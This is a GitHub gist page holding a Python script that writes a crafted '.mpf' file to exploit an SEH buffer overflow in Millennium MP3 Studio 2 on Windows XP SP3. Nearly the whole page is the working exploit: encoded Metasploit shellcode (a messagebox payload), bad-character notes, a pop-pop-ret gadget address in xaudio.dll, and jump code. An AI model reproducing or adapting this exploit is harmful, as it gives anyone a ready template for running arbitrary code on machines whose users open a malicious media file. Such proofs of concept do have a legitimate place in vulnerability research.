Created
November 10, 2012 21:25
-
-
Save synap5e/4052563 to your computer and use it in GitHub Desktop.
Millennium mp3 studio 2 SEH
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import os | |
| # Millennium mp3 studio 2 SEH ".mpf" client side exploit | |
| # Version 2.0 - DEP + ASLR disabled | |
| # Tested: Windows XP SP3 - English | |
| # Author: Simon Pinfold | |
| #badchars 00,1a,0d,0e,0f | |
| space = 1280 | |
| payload = "\x90" * 20 | |
| # windows/messagebox - 288 bytes | |
| # http://www.metasploit.com | |
| # Encoder: x86/shikata_ga_nai | |
| # VERBOSE=false, EXITFUNC=process, TITLE=Check, TEXT=Code | |
| # Execution!, ICON=WARNING | |
| payload += ( | |
| "\xd9\xc5\xd9\x74\x24\xf4\xb8\xa3\xac\xcb\x47\x5a\x33\xc9" | |
| "\xb1\x42\x83\xea\xfc\x31\x42\x14\x03\x42\xb7\x4e\x3e\x9e" | |
| "\x5c\x15\x18\x55\x86\xde\xaa\x44\x74\x69\xfc\xa1\x1c\x1d" | |
| "\x8f\x01\x57\x57\x7c\xe9\x11\x84\xf7\xab\xd5\x3f\x79\x14" | |
| "\x6e\x09\xbe\x1b\x68\x03\x4d\xfa\x89\x3a\x4e\x1c\xe9\x37" | |
| "\xdd\xfb\xcd\xcc\x5b\x38\x86\x87\x4b\x38\x99\xcd\x07\xf2" | |
| "\x81\x9a\x42\x23\xb0\x77\x91\x17\xfb\x0c\x62\xd3\xfa\xfc" | |
| "\xba\x1c\xcd\xc0\x41\x4e\xa9\x01\xcd\x88\x70\x4e\x23\x96" | |
| "\xb5\xba\xc8\xa3\x45\x19\x19\xa1\x54\xea\x03\x6d\x97\x06" | |
| "\xd5\xe6\x9b\x93\x91\xa3\xbf\x22\x4d\xd8\xbb\xaf\x90\x37" | |
| "\x4a\xeb\xb6\xdb\x2d\x37\x04\xeb\x84\x63\xe0\x09\x5f\x49" | |
| "\x9b\x5f\x11\x40\xb0\x32\x45\xc3\xb7\x4c\x6a\x75\x02\xb7" | |
| "\x2f\xf8\x55\x55\x3c\x82\x7a\xbe\x90\x64\x0c\x41\xeb\x8a" | |
| "\x98\xfb\x1b\x1d\xf7\x6f\x3b\x9c\x6f\x43\x09\x30\x14\xcb" | |
| "\x18\x3f\xb1\x79\x6a\xe3\x1d\x74\xe3\xfa\x08\x77\xa6\x06" | |
| "\x3c\x45\x18\xbc\x96\xe8\xd5\x7e\x61\xf0\xc1\x2c\x86\x68" | |
| "\xf6\x2e\xa9\x03\x63\x89\x76\xf4\x1b\x6a\x1f\x91\xb8\x5d" | |
| "\x04\xd1\x62\xba\xbf\x6b\x79\xaa\xd0\x05\x5c\x73\x47\xb9" | |
| "\xeb\xf7\xfe\x55\x33\xbd\x78\xc3\x5b\x7e\x16\x6f\xfe\xb1" | |
| "\x21\xe7\x4c\x96\xbe\x71\xad\xe7\x12\xeb\x1d\x5b\xc2\xbe" | |
| "\xa2\x8b\xd5\xfe\x0c\xd3\x43\xf7") | |
| buffer = "http://" | |
| buffer += 'A' * 2825 | |
| buffer += payload | |
| buffer += 'A' * (space - len(payload)) | |
| buffer += "\x90\x90\xeb\x04" | |
| buffer += "\xbe\xfa\x01\x10" # 0x1001fabe pop edi; pop esi; ret ; xaudio.dll | |
| #15 bytes space for jumpcode | |
| jmp = ( "\x90" # nop | |
| "\x59" # pop ecx | |
| "\x59" # pop ecx | |
| "\x59" # pop ecx | |
| "\xfe\xcd" # dec ch (ch is lsb of ecx) | |
| "\xfe\xcd" # dec ch | |
| "\xfe\xcd" # dec ch | |
| "\xfe\xcd" # dec ch | |
| "\xfe\xcd" # dec ch | |
| "\xff\xe1" # jmp ecx | |
| ) | |
| buffer += jmp | |
| buffer += 'B' * (5007 - len(buffer)) | |
| print len(buffer) | |
| name = "file.mpf" | |
| if os.path.exists(name): | |
| os.remove(name) | |
| f = file(name, "w") | |
| f.write(buffer) | |
| f.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment